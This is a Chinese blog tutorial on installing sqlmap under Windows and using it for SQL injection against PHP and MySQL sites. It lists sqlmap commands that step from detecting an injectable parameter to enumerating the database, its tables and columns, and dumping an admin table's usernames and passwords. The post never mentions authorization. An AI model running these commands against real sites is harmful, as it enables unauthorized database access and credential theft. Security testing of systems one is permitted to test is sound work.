当前位置:首页 > 互联网杂谈 > 正文内容

利用sqlmap进行php+mysql注入(windows环境)

老威3年前 (2018-06-25)互联网杂谈25940

老威SEO前段时间研究了一下sqlmap,其作为一款自动化的sql注入渗透工具,注入方式、注入成功后的取数据等等都是自动化的,非常适合我们这些小白前期玩玩渗透玩玩安全,它是用python写的,因此需要先安装python环境,一般都是傻瓜式安装操作

一、sqlmap的安装

1.python下载地址:

https://www.python.org/downloads/

2.sqlmap下载地址:

http://sqlmap.org/

把下载的sqlmap压缩包解压到文件夹sqlmap中,并将其复制粘贴到 “C:\Python27” 目录下(注:Python27为python安装文件夹)

在桌面新建一个cmd的快捷方式,将其命名为“SQLMap”,并键入对象位置为:cmd,快捷方式名称:SQLMap

双击刚才创建的快捷方式,输入sqlmap.py -h,出现如下信息则表示安装成功。 

sqlmap教程

二、sqlmap的常用命令

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193"  检测注入

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --current-user   获取当前用户  laowei@localhost

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --current-db 获取当前数据库 如为db_inis

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --tables -D db_inis

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables  获取当前数据库下所有表 如表为3

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user   获取表3下的所有字段 如字段为4,5,6

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user -C pwd,username --dump   注入完成

最后:此文章还待更新中……请持续关注

扫描二维码至手机访问

扫描二维码推送至手机访问。

版权声明:本文由老威SEO发布,如需转载请注明出处。

转载请注明出处:http://www.lwseo.cn/hlw/100.html

分享给朋友:

相关文章

windows环境下"php-cgi.exe - FastCGI 进程意外退出"的解决办法

windows环境下"php-cgi.exe - FastCGI 进程意外退出"的解决办法

市面上很多windows环境下的php集成软件,像是phpstudy、wampserver、AppServ等,傻瓜式操作解决了我们很多繁杂的操作问题,但是也会出现一些特殊情况,大概就是人家php明明是...

阿里云虚拟主机设置301重定向

阿里云虚拟主机设置301重定向

目前老威SEO博客是搭建在阿里云虚拟主机里面的,本来这个主机管理页面有一个301重定向的功能,设置好根域名跳转www域名之后我就没怎么管,直到昨天我才发现它只有这一个跳转,根域名其他的目录根本不能跳转...

超实用的js代码混淆器

超实用的js代码混淆器

JS混淆工具/* 这个是一个类 */ function xx(num,str) { //说明 var a = num; this.aa = a; this.bb = function(...

分享一些可用的VIP电影解析接口

分享一些可用的VIP电影解析接口

作为一名资深的火迷,追了火影忍者N年,从火影忍者到博人传新世代一直在追,但是不久前各大视频网站开始玩起来VIP专权了,不是VIP看不了。MD老威这么穷哪有钱冲会员啊,平时我也不追剧,也就偶看看电影,所...

SSL POODLE[贵宾犬]漏洞的解决办法

SSL POODLE[贵宾犬]漏洞的解决办法

最近老威做了几个https协议的站,本来对ssl这东西不是很懂,全站重定向到https后,检测网站的时候出来一大堆漏洞,其中包括SSL POODLE,俗称“贵宾犬”漏洞,此漏洞是针对SSL3.0中CB...

利用伪静态实现阿里云虚拟主机建立多个网站

利用伪静态实现阿里云虚拟主机建立多个网站

之前老威曾研究过如何用一个阿里云虚拟主机实现多个网站的访问,比如访问PC端是www.lwseo.cn,移动端可以跳转到m.lwseo.cn,访问不同的域名以及不同的页面,毕竟虚拟主机不像是服务器可以任...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。